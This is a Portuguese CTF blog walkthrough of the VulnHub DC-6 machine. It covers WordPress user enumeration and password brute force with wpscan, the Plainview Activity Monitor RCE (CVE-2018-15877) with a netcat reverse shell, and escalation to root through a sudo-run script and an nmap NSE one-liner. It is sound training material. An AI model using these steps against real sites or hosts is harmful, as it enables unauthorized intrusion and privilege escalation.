DC-6

Estou aqui novamente para apresentar mais uma boot2root VM para vocês. Dessa vez lhes trago DC-6.
Essa máquina foi lançada em 26 de Abril de 2019 e o download pode ser realizado em https://www.vulnhub.com/entry/dc-6,315/.
Sem mais delongas, vamos ao que interessa!

Como sempre começamos com o host discovery:

$netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:00 1 60 Unknown vendor
192.168.56.100 08:00:27:9f:1c:47 1 60 PCS Systemtechnik GmbH
192.168.56.101 08:00:27:af:04:55 1 60 PCS Systemtechnik GmbH

Agora que já identificamos nosso alvo, podemos descobrir quais são os serviços existentes nesse host:

$nmap -sS -sV -sC -Pn -p- 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-25 19:30 EDT                                                
Nmap scan report for 192.168.56.101
Host is up (0.00014s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)                                             
| ssh-hostkey:
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)                                                 
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)                                                
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)                                              
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
MAC Address: 08:00:27:AF:04:55 (Oracle VirtualBox virtual NIC)                                                 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                 
Nmap done: 1 IP address (1 host up) scanned in 18.24 seconds

Baseado no output do nmap e na informação disponibilizada pelo criador do desafio, temos que adicionar a entrada “192.168.56.101 wordy” no /etc/hosts.

Após essa inclusão, basta acessar a aplicação web.

Captura de tela de 2019-06-29 15-47-44

Como trata-se de um wordpress, vamos executar o wpscan para tentar identificar algum usuário válido.

$wpscan --url http://wordy/ -e u,vp --plugins-detection aggressive 
[i] User(s) Identified:

[+] admin
 | Detected By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] sarah
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Foram identificados 5 usuários. Vamos adicioná-los em uma lista para um utilização em um brute futuro.

$ cat user.lst 
jens
mark
graham
sarah
admin

Baseado na dica disponibilizada…

OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. 😉

Temos que filtrar algumas senhas do arquivo rockyou.txt. Caso contrário, o tempo de execução será muito alto.

$cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.lst                                   
root@kali:~# wc -l passwords.lst
2668 passwords.lst

Tudo certo…como agora temos uma lista de usuários válidos e possíveis senhas. Vamos executar um brute force.

$wpscan --url http://wordy/ -U user.lst -P passwords.lst

[i] Valid Combinations Found:
 | Username: mark, Password: helpdesk01
[+] Finished: Tue Jun 25 20:12:37 2019
[+] Requests Done: 12598
[+] Cached Requests: 5
[+] Data Sent: 5.028 MB
[+] Data Received: 7.671 MB
[+] Memory used: 127.301 MB
[+] Elapsed time: 00:03:25

Credencial de acesso identificada.

Vamos validar o acesso ao portal de administração utilizando essa credencial.

Captura de tela de 2019-06-26 00-41-46

Inicialmente quando executamos o wpscan para identificar os usuários, também identificamos os plugins vulneráveis.

[+] plainview-activity-monitor                                                                                  
 | Location: http://wordy/wp-content/plugins/plainview-activity-monitor/                                        
 | Last Updated: 2018-08-26T15:08:00.000Z                                                                       
 | Readme: http://wordy/wp-content/plugins/plainview-activity-monitor/readme.txt                                
 | [!] The version is out of date, the latest version is 20180826                                               
 | [!] Directory listing is enabled                                                                             
 |                                                                                                              
 | Detected By: Known Locations (Aggressive Detection)                                                          
 |                                                                                                             
 | [!] 1 vulnerability identified:                               
 |                                                               
 | [!] Title: Plainview Activity Monitor <= 20161228 - Remote Command Execution (RCE)                          
 |     Fixed in: 20180826                                                                                      
 |     References:                                                                                              
 |      - https://wpvulndb.com/vulnerabilities/9114                                                             
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15877                                         
 |      - https://plugins.trac.wordpress.org/changeset/1930493/plainview-activity-monitor                       
 |      - https://github.com/aas-n/CVE/tree/master/CVE-2018-15877             
 |                                                    
 | Version: 20161228 (50% confidence)
 | Detected By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://wordy/wp-content/plugins/plainview-activity-monitor/readme.txt

E para facilitar nossa vida, identificamos o plugin Plainview Activity Monitor que possui um RCE (CVE-2018-15877).

Baixando o exploit tivemos apenas realizar pequenas alterações.

Captura de tela de 2019-06-26 00-39-04

E executá-lo.

Captura de tela de 2019-06-29 17-28-58

$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 48040
python -c 'import pty;pty.spawn("/bin/bash")';
www-data@dc-6:/var/www/html/wp-admin$ ^Z
[1]+ Stopped nc -nvlp 4444
root@kali:~/Documents/vulnhub/dc-6# stty raw -echo
root@kali:~/Documents/vulnhub/dc-6# nc -nvlp 4444

www-data@dc-6:/var/www/html/wp-admin$ export TERM=screen
www-data@dc-6:/var/www/html/wp-admin$ export SHELL=/bin/bash
www-data@dc-6:/var/www/html/wp-admin$ stty rows 33 cols 112
www-data@dc-6:/var/www/html/wp-admin$

download (4)

Como sempre…hora de escalonar privilégio!

Identificamos a senha do usuário graham dentro do arquivo things-to-do.txt.

www-data@dc-6:/var/www/html/wp-admin$ ls -lR /home
/home:
total 16
drwxr-xr-x 2 graham graham 4096 Apr 26 13:28 graham
drwxr-xr-x 2 jens jens 4096 Apr 26 13:29 jens
drwxr-xr-x 3 mark mark 4096 Apr 26 13:28 mark
drwxr-xr-x 2 sarah sarah 4096 Apr 24 23:07 sarah

/home/graham:
total 0

/home/jens:
total 4
-rwxrwxr-x 1 jens devs 50 Apr 26 02:19 backups.sh

/home/mark:
total 4
drwxr-xr-x 2 mark mark 4096 Apr 26 01:56 stuff

/home/mark/stuff:
total 4
-rw-r--r-- 1 mark mark 241 Apr 26 01:53 things-to-do.txt

/home/sarah:
total 0
www-data@dc-6:/var/www/html/wp-admin$ cat /home/mark/stuff/things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
www-data@dc-6:/var/www/html/wp-admin$

Alterando para o usuário graham.

www-data@dc-6:/var/www/html/wp-admin$ su graham                                                                                                     
Password: 
graham@dc-6:/var/www/html/wp-admin$

Temos acesso a executar um script de backup com privilégios do usuário jens.

graham@dc-6:/var/www/html/wp-admin$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
graham@dc-6:/var/www/html/wp-admin$

Vamos escalonar privilégio horizontalmente adicionando uma chamada ao /bin/bash dentro desse script.

$ cat /home/jens/backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
/bin/bash

E executá-lo via sudo.

$ sudo -u jens /home/jens/backups.sh
tar: Removing leading `/' from member names
tar (child): backups.tar.gz: Cannot open: Permission denied
tar (child): Error is not recoverable: exiting now
tar: backups.tar.gz: Wrote only 4096 of 10240 bytes
tar: Child returned status 2
tar: Error is not recoverable: exiting now
jens@dc-6:/var/www/html/wp-admin$ id
uid=1004(jens) gid=1004(jens) groups=1004(jens),1005(devs)
jens@dc-6:/var/www/html/wp-admin$

Agora constatamos que o usuário jens possui acesso ao nmap com privilégio de super user.

$ sudo -l
Matching Defaults entries for jens on dc-6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
(root) NOPASSWD: /usr/bin/nmap
jens@dc-6:/var/www/html/wp-admin$

Logo vamos utlizá-lo para escalonar privilégio..

echo "os.execute('/bin/bash')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
Starting Nmap 7.40 ( https://nmap.org ) at 2019-07-03 06:37 AEST
root@dc-6:/var/www/html/wp-admin# 

Coletando a flag.

root@dc-6:/var/www/html/wp-admin# cd /root
root@dc-6:~# ls
theflag.txt
root@dc-6:~# cat theflag.txt


Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.


root@dc-6:~#

game-over-knuckles-only_480x

Bônus:

Além do plugin plainview-activity-monitor, também podemos utilizar o plugin user-role-editor como entry point.

[+] user-role-editor
| Location: http://wordy/wp-content/plugins/user-role-editor/
| Last Updated: 2019-06-15T05:45:00.000Z
| Readme: http://wordy/wp-content/plugins/user-role-editor/readme.txt
| [!] The version is out of date, the latest version is 4.51.1
|
| Detected By: Known Locations (Aggressive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: User Role Editor <= 4.24 - Privilege Escalation
| Fixed in: 4.25
| References:
| - https://wpvulndb.com/vulnerabilities/8432
| - https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/
|
| Version: 4.24 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://wordy/wp-content/plugins/user-role-editor/readme.txt

Utilizando essa vuln, podemos escalonar privilégio para administrator. Precisamos apenas seguir os seguintes passos:

  1. Acessar o menu user
  2. Em seguida Your Profile
  3. E por último Update Profile

Interceptando o request com o Burp, precisamos adicionar o parâmetro ure_other_roles=administrator

Captura de tela de 2019-07-04 23-27-46

Acessando novamente a opção Users, percebemos que o usuário mark agora possui a role Administrator.

Captura de tela de 2019-07-04 23-29-24

Com isso basta utilizar o yertle para ganhar shell na máquina.

Até a próxima.

Referências:
https://www.exploit-db.com/exploits/45274
https://www.andreafortuna.org/2018/05/16/exploiting-sudo-for-linux-privilege-escalation/
https://packetstormsecurity.com/files/147515/WordPress-User-Role-Editor-Plugin-Privilege-Escalation.html

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair /  Alterar )

Foto do Google

Você está comentando utilizando sua conta Google. Sair /  Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair /  Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair /  Alterar )

Conectando a %s